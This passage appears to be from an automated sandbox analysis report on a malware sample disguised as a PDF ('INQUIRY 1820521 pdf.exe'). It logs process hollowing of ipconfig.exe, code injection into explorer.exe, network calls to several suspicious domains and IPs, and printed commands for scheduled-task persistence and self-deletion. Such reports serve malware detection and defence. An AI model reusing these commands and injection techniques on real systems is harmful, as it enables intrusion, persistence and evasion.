          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B8EC7 mov eax, dword ptr fs:[00000030h]16_2_032B8EC7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0332FEC0 mov eax, dword ptr fs:[00000030h]16_2_0332FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03348D34 mov eax, dword ptr fs:[00000030h]16_2_03348D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]16_2_03294120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]16_2_03294120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]16_2_03294120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]16_2_03294120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03294120 mov ecx, dword ptr fs:[00000030h]16_2_03294120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A513A mov eax, dword ptr fs:[00000030h]16_2_032A513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A513A mov eax, dword ptr fs:[00000030h]16_2_032A513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]16_2_032A4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]16_2_032A4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]16_2_032A4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327AD30 mov eax, dword ptr fs:[00000030h]16_2_0327AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032FA537 mov eax, dword ptr fs:[00000030h]16_2_032FA537
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]16_2_03283D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]16_2_03279100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]16_2_03279100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]16_2_03279100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327C962 mov eax, dword ptr fs:[00000030h]16_2_0327C962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327B171 mov eax, dword ptr fs:[00000030h]16_2_0327B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327B171 mov eax, dword ptr fs:[00000030h]16_2_0327B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329C577 mov eax, dword ptr fs:[00000030h]16_2_0329C577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329C577 mov eax, dword ptr fs:[00000030h]16_2_0329C577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B3D43 mov eax, dword ptr fs:[00000030h]16_2_032B3D43
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329B944 mov eax, dword ptr fs:[00000030h]16_2_0329B944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329B944 mov eax, dword ptr fs:[00000030h]16_2_0329B944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F3540 mov eax, dword ptr fs:[00000030h]16_2_032F3540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03297D50 mov eax, dword ptr fs:[00000030h]16_2_03297D50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F69A6 mov eax, dword ptr fs:[00000030h]16_2_032F69A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A61A0 mov eax, dword ptr fs:[00000030h]16_2_032A61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A61A0 mov eax, dword ptr fs:[00000030h]16_2_032A61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A35A1 mov eax, dword ptr fs:[00000030h]16_2_032A35A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]16_2_032F51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]16_2_032F51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]16_2_032F51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]16_2_032F51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_033405AC mov eax, dword ptr fs:[00000030h]16_2_033405AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_033405AC mov eax, dword ptr fs:[00000030h]16_2_033405AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]16_2_032A1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]16_2_032A1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]16_2_032A1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329C182 mov eax, dword ptr fs:[00000030h]16_2_0329C182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]16_2_032A2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]16_2_032A2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]16_2_032A2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]16_2_032A2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]16_2_03272D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]16_2_03272D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]16_2_03272D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]16_2_03272D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]16_2_03272D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AA185 mov eax, dword ptr fs:[00000030h]16_2_032AA185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AFD9B mov eax, dword ptr fs:[00000030h]16_2_032AFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AFD9B mov eax, dword ptr fs:[00000030h]16_2_032AFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A2990 mov eax, dword ptr fs:[00000030h]16_2_032A2990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03328DF1 mov eax, dword ptr fs:[00000030h]16_2_03328DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]16_2_0327B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]16_2_0327B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]16_2_0327B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328D5E0 mov eax, dword ptr fs:[00000030h]16_2_0328D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328D5E0 mov eax, dword ptr fs:[00000030h]16_2_0328D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]16_2_0333FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]16_2_0333FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]16_2_0333FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]16_2_0333FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_033041E8 mov eax, dword ptr fs:[00000030h]16_2_033041E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]16_2_032F6DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]16_2_032F6DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]16_2_032F6DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6DC9 mov ecx, dword ptr fs:[00000030h]16_2_032F6DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]16_2_032F6DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]16_2_032F6DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]16_2_0328B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]16_2_0328B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]16_2_0328B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]16_2_0328B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032ABC2C mov eax, dword ptr fs:[00000030h]16_2_032ABC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]16_2_032A002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]16_2_032A002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]16_2_032A002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]16_2_032A002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]16_2_032A002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03344015 mov eax, dword ptr fs:[00000030h]16_2_03344015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03344015 mov eax, dword ptr fs:[00000030h]16_2_03344015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]16_2_032F6C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]16_2_032F6C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]16_2_032F6C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]16_2_032F6C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]16_2_03331C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]16_2_032F7016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]16_2_032F7016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]16_2_032F7016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]16_2_0334740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]16_2_0334740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]16_2_0334740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03332073 mov eax, dword ptr fs:[00000030h]16_2_03332073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03341074 mov eax, dword ptr fs:[00000030h]16_2_03341074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329746D mov eax, dword ptr fs:[00000030h]16_2_0329746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0330C450 mov eax, dword ptr fs:[00000030h]16_2_0330C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0330C450 mov eax, dword ptr fs:[00000030h]16_2_0330C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AA44B mov eax, dword ptr fs:[00000030h]16_2_032AA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03290050 mov eax, dword ptr fs:[00000030h]16_2_03290050
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hhcuerkn.com
          Source: C:\Windows\explorer.exeNetwork Connect: 210.152.87.233 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.82.58 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.xinghai-nb.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mobcitylabs.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeMemory written: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: B50000Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'Jump to behavior
          Source: explorer.exe, 0000000A.00000000.683281450.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000A.00000002.921124945.0000000005E50000.00000004.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.701814701.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
